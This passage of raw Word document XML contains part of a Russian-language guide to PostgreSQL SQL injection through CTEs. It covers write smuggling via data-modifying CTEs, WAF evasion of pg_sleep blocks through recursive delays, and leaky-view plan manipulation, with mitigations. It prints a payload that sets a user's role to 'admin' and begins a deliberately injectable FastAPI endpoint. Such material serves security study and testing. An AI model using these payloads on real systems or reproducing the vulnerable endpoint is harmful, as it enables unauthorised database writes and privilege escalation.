          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (...) SELECT/INSERT/UPDATE/DELETE</w:t>
      </w:r>
      <w:r>
        <w:t>, которая в PG не просто синтаксический сахар, а полноправный механизм с уникальными свойствами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EEA4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTE может содержать DML с RETURNING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ins AS (INSERT INTO t VALUES (...) RETURNING id) SELECT id FROM ins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>одна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL-команда выполняет write и возвращает результат. Это превращает SELECT-эндпоинт в эндпоинт записи без необходимости в stacked queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F22D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CTE — это </w:t>
      </w:r>
      <w:r>
        <w:t>одна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> команда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для PG-парсера. На уровне wire-protocol (см. 2.1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (UPDATE ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт как один Parse/Bind/Execute — extended-protocol-блокировки stacked-queries (см. 3.5) её не останавливают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027E1DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE r(n) AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;N) SELECT...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — генерирует delay без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; полезно когда WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.9.0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151042F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTE-материализация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> контролирует optimizer plan: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS MATERIALIZED (...) ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принуждает плановщик к материализации (фенс между CTE-телом и внешним запросом); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наоборот, разрешает inline (дефолт с PG 12). Это критично для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leaky views</w:t>
      </w:r>
      <w:r>
        <w:t>: атакующий контролирует, применится ли view-фильтр до или после его инжектированного leaky-предиката.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4A364" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с 3.5 (stacked queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D0FFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — несколько команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — одна команда с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (INSERT|UPDATE|DELETE ...) SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>. Различие практическое:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B7F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5 (stacked) блокируется extended-protocol drivers (psycopg3 default, asyncpg c parameters, pgjdbc default) — сервер режет multi-statement Parse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6394780D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.10.1 (DML в CTE) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не блокируется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: одна команда, проходит через любой protocol. Это делает 3.10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сильнее</w:t>
      </w:r>
      <w:r>
        <w:t>, чем 3.5, в большинстве современных стэков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE6383" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с 3.17 (RLS bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC7BCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.17.1 разбирает CVE-2024-10976 — RLS игнорирует user ID change в subquery/CTE/SQL-функции (R9), специфика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS-policy plan-cache reuse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3.10 — про CTE как самостоятельный класс атак, не привязанный к RLS. Пересечение точечное: оба используют CTE как механизм, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 атакует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через CTE-семантику (DML, recursion, materialization), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 атакует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через CVE в RLS-обработке плана.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B60778" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Структура подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22494FA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (R22) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ins AS (INSERT/UPDATE/DELETE ... RETURNING) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Smuggling write-операций через SELECT-эндпоинт. Основной payload — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... UNION SELECT * FROM (WITH x AS (UPDATE users SET role='admin' RETURNING 1) SELECT 1 FROM x) y</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718170F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.2 CTE как амплификатор time-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE r AS (...) SELECT...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Когда WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, атакующий генерирует delay через recursion / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с heavy CPU. Связка с 3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD78F85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт!) + injection в WHERE с leaky-функцией → плановщик пушит leaky-функцию перед view-фильтром. CTE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принудительно сохраняет inline-плана (дефолт PG 12+); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт фенс. Объяснение, как защититься (security_barrier=on + WITH MATERIALIZED).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9A86D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AF1F8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CTE сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не требует привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это синтаксис, доступный всем. Привилегии определяются содержимым CTE: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2620E01B"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D599E9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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226D0B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2FC1793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42426D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.1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FB3F8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>INSERT/UPDATE/DELETE на целевую таблицу (на ту, в которую пишет CTE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2A6560F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53CB8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.2</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B4F69B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC (CTE рекурсия — общесистемная фича)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="556467E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46AB18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.3</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E81BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SELECT на view + право CREATE FUNCTION (для leaky-функции)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07F3223A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для 3.10.1 ключевой нюанс: application-роль часто имеет INSERT/UPDATE на свои таблицы (audit_log, sessions, password_resets) — но это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не должно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> означать, что любой SELECT-эндпоинт может туда писать. 3.10.1 — про разрыв этой неявной защиты «GET = только чтение».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574B09D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для 3.10.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно есть у application-роли по умолчанию (PUBLIC может создавать в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> схеме до PG 15; с PG 15 — только в собственной user-schema). Без CREATE FUNCTION leaky-функция создаётся через 3.7 (RCE) или 3.13 (privilege escalation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A82A96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый код — общий для 3.10.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26769522" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Все подразделы 3.10 используют один и тот же FastAPI-эндпоинт с прямой конкатенацией в WHERE — типичный паттерн для админ-фильтров, дашбордов, аналитических query-builder-ов. Чтобы не дублировать, опишем здесь:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E440E9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1B85E"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6B3A9004" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3C730"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4BED5F44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6CA3F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.dependencies import get_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA5880" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981FB65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9623D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE8BF65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080387EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/orders/filter")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A821086" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def filter_orders(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC0A977" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    where_clause: str,  # пользовательский фильтр для гибкого поиска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C320A55"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6C31905" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3D339" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
